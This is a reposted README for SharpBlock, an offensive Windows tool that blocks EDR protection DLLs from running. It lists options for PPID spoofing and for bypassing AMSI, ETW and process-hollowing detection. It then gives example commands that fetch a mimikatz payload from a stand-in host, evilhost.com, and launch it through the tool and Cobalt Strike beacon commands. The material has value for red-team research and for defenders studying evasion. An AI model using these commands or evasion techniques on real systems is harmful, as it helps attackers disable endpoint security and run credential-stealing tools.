A method of bypassing EDR's active projection DLL's by preventing entry point execution.
SharpBlock by @_EthicalChaos_
DLL Blocking app for child processes x64
-e, --exe=VALUE Program to execute (default cmd.exe)
-a, --args=VALUE Arguments for program (default null)
-n, --name=VALUE Name of DLL to block
-c, --copyright=VALUE Copyright string to block
-p, --product=VALUE Product string to block
-d, --description=VALUE Description string to block
-s, --spawn=VALUE Host process to spawn for swapping with the target exe
-ppid=VALUE Parent process ID for spawned child (PPID Spoofing)
-w, --show Show the lauched process window instead of the
default hide
--disable-bypass-amsi Disable AMSI bypassAmsi
--disable-bypass-cmdline
Disable command line bypass
--disable-bypass-etw Disable ETW bypass
--disable-header-patch Disable process hollow detection bypass
-h, --help Display this help
SharpBlock -e http://evilhost.com/mimikatz.bin -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee
execute-assembly SharpBlock.exe -e \\.\pipe\mimi -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee
upload_file /home/haxor/mimikatz.exe \\.\pipe\mimi
Note, for the upload_file beacon command, load upload.cna into Cobalt Strike's Script Manager
文章来源: https://github.com/CCob/SharpBlock
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh